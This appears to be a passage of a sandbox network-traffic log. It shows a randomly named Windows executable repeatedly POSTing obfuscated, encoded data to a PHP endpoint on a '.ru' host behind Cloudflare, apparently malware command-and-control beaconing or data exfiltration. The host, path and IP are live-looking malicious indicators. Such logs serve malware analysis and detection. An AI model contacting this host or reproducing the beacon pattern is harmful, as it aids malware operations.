                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:12.427242994 CET | 1072 | OUT | Data Raw: 54 5e 5b 52 56 45 5c 55 5d 56 5b 57 54 5e 51 5e 58 54 58 58 5b 50 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[RVE\U]V[WT^Q^XTXX[PWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0'X#2%\! $";R*4?P5$% ])&(;2!^&%X*/
                                                                                                                                Jan 1, 2025 21:48:12.429788113 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:12.718043089 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:12 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtDnKnYYu0810QYeCw%2B%2BNAR7FuCrOgK5GGiaM47u8ROAdB8IH2BZOx%2FLenCcRWaOEcrkppOAaSaQ6jsFVbqRZT8g839MV52x9tY6RETnAzcqmrh9vcAZRaUQ%2F%2Bk5ARDuZkgGlHoT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e6d6e6018c0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3318&min_rtt=1586&rtt_var=4059&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=94528&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                62 | 192.168.2.4 | 49918 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:12.850249052 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:13.202413082 CET | 1072 | OUT | Data Raw: 54 57 5e 53 56 43 59 5f 5d 56 5b 57 54 55 51 5e 58 50 58 5d 5b 52 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW^SVCY_]V[WTUQ^XPX][RWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^&"' =[".?Z$[,6'U<64R$5(&(%!^&%X*
                                                                                                                                Jan 1, 2025 21:48:13.294739008 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:13.564369917 CET | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:13 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lK6arLxC%2FyaF6F%2FF44ruMruqfIp%2B4MKWUQc8E%2FoSXG6JsDD%2F%2Ba1lajj1eoWJ3T%2BU5VY%2FM6%2BMaBlNVR22miICOPhITg%2BCrE%2BCmedinu0Ex11n7y0esxp5L0qZyBpmKEz3sb3sIIOZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e72ccbb421f-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4654&min_rtt=1673&rtt_var=6590&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=57198&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                63 | 192.168.2.4 | 49924 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:13.687453032 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                64 | 192.168.2.4 | 49925 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:13.849174976 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:14.202760935 CET | 1788 | OUT | Data Raw: 54 52 5e 50 53 47 59 5e 5d 56 5b 57 54 5f 51 59 58 51 58 5d 5b 50 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR^PSGY^]V[WT_QYXQX][PWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$1 #![!=#\3['";<*74"(S$ **&:<$_1!^&%X*+
Jan 1, 2025 21:48:14.322061062 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:14.583705902 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCq0gFxtjy%2B7cT778rMrYiJbhZz78Sa1GtAd4SAJNrZqoFXAzVqLAqQ5edQKPK3uMwO2wQiM621u9vtPUKgiy6cPagIY%2BpCzbXqJt0SlDHJo6vMbf6ZHORAQFu3givxuBK4gqXei"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e792bea5e65-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4340&min_rtt=2112&rtt_var=5248&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=73227&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 52 28 1f 33 55 34 22 3d 54 2a 16 0e 01 32 31 3e 5c 31 1d 03 08 28 16 01 59 2b 2f 2b 0d 26 5a 20 17 27 2a 21 57 2b 22 02 5d 3e 26 20 5c 05 1b 39 14 30 07 23 5e 25 2b 0f 1e 2a 33 20 58 37 3c 21 01 2a 20 38 1d 21 38 3d 10 25 16 26 0b 33 3a 0b 0d 28 02 27 5f 3d 30 3c 0d 26 07 2a 51 0f 16 3b 0a 3d 20 26 10 2a 3c 3b 02 30 32 3b 06 35 43 31 56 25 05 3b 1d 27 04 35 00 3f 00 1e 0e 22 1d 33 11 32 12 04 13 32 10 37 50 39 00 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!R(3U4"=T*21>\1(Y+/+&Z '*!W+"]>& \90#^%+*3 X7<!* 8!8=%&3:('_=0<&*Q;= &*<;02;5C1V%;'5?"3227P9&^ "S?UV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49929 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:13.971604109 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:14.327630997 CET | 1072 | OUT | Data Raw: 54 5e 5b 5f 56 42 59 53 5d 56 5b 57 54 5f 51 5d 58 5c 58 5c 5b 52 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[_VBYS]V[WT_Q]X\X\[RWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0 #2Z .7]$=0[6(??+W#&7$V:>%)D+.32:!^&%X*+
Jan 1, 2025 21:48:14.434164047 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:14.687953949 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZMIH7Xrj2PmWBb45G6%2FlQ9qaIuYBaa1t4GvQnwc7O0WVlvTs2YCNrMZRrGPzdpAcaVFqhcl3xfW09Xmj9QDR6BZB6GVqsp5QQNLgp1FHv9hd6YJBWq9gnRZsF7DztJlIBBvgnRi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e79ed24c47a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3291&min_rtt=1631&rtt_var=3932&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=97888&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 49936 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:14.812613010 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:48:15.175303936 CET | 1072 | OUT | Data Raw: 51 54 5b 55 53 40 59 57 5d 56 5b 57 54 58 51 5d 58 50 58 5d 5b 53 57 40 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[US@YW]V[WTXQ]XPX][SW@VYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["&2, 1!-?$_#+(*'4"8V'2Y=&>>1!^&%X*7
Jan 1, 2025 21:48:15.256421089 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:15.557360888 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:15 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohfXtznWLwuXyCtxQZpQrwVOzYCdNV9Kq%2FwlqLR3dF4moCTqEy6svp7HIzgzBb%2BpzLGnr7toMfkVa9Z2K%2FMK939s1oR9vRkbcFdgrLcTcjbCw%2FPw5huOqTtG38S2fOCHEExRuMr9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e7f0ece421b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3396&min_rtt=2058&rtt_var=3448&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=114393&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49943 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:15.694185019 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:48:16.046394110 CET | 1072 | OUT | Data Raw: 54 56 5b 55 53 43 59 5e 5d 56 5b 57 54 5f 51 5c 58 5c 58 5f 5b 51 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[USCY^]V[WT_Q\X\X_[QWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!31#^7!Y >7['0Y!+B #6'02X*&9B?32!^&%X*+
Jan 1, 2025 21:48:16.158142090 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:16.328347921 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:16 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uqtNBr1QLnPQc6EfHN%2FMYh2SQqmMF7u6c%2FuAnUHtKRn7%2FBLTbu6VHVomEiuZLyJZs3Sx%2Fi88aMAD4zBWHuLCATsB%2B5hBqNEElElqKAgv97QBEZ%2FiWldoGP9%2BwxWALxh9TXlwyrxP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e84a8610c8a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4600&min_rtt=1594&rtt_var=6609&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=56937&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49949 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:16.453356981 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:16.811736107 CET | 1072 | OUT | Data Raw: 54 51 5b 56 56 40 5c 55 5d 56 5b 57 54 58 51 5d 58 56 58 5c 5b 57 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[VV@\U]V[WTXQ]XVX\[WWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'1049!>?3>;#;#+$+U!(W$"X(6"<':!^&%X*7
Jan 1, 2025 21:48:16.924693108 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:17.250823021 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z745oNPoF%2F8JDWLa%2FVhHdf%2BEn7%2FWpFUknljf6NviPxm2A%2FxnN4oEtHeNt4M33E2oUyvOUpy%2FvvkQxBgaqRoD9HXvhGj52hNlGfKkrUdqVEgve3cTIhItAVtP70h1ClYIaBGWxpyd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e897e8042b5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4682&min_rtt=1603&rtt_var=6760&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=55642&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49955 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:17.379276991 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:17.739327908 CET | 1072 | OUT | Data Raw: 54 5f 5e 50 56 45 59 52 5d 56 5b 57 54 59 51 52 58 55 58 5d 5b 57 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_^PVEYR]V[WTYQRXUX][WWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["3"+_726<$/!8+*7+Q"5S00&)@*?-8[1!^&%X*3
Jan 1, 2025 21:48:17.822901011 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:18.115868092 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8iJFwiHTKUxmD1avVudrcg99PeBrfs2zn4aKH4UdBvHAaD8Ih5O0CG42ALZbSs%2BldlTcP3%2BTPRhet3HKuECYAo6rK%2FcHF%2BQVHT%2BHFe4ky7mD5iY4l4ciiQgfmkG%2FZGEyjz6dG9i"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e8f1b354262-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2621&min_rtt=1593&rtt_var=2654&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=148645&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                70 | 192.168.2.4 | 49964 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:18.550086021 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:18.905550957 CET | 1072 | OUT | Data Raw: 51 55 5b 50 56 44 5c 52 5d 56 5b 57 54 55 51 53 58 5c 58 50 5b 55 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[PVD\R]V[WTUQSX\XP[UWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$#[#"5>4$="#(7'U"?$32*%9A?. ':!^&%X*
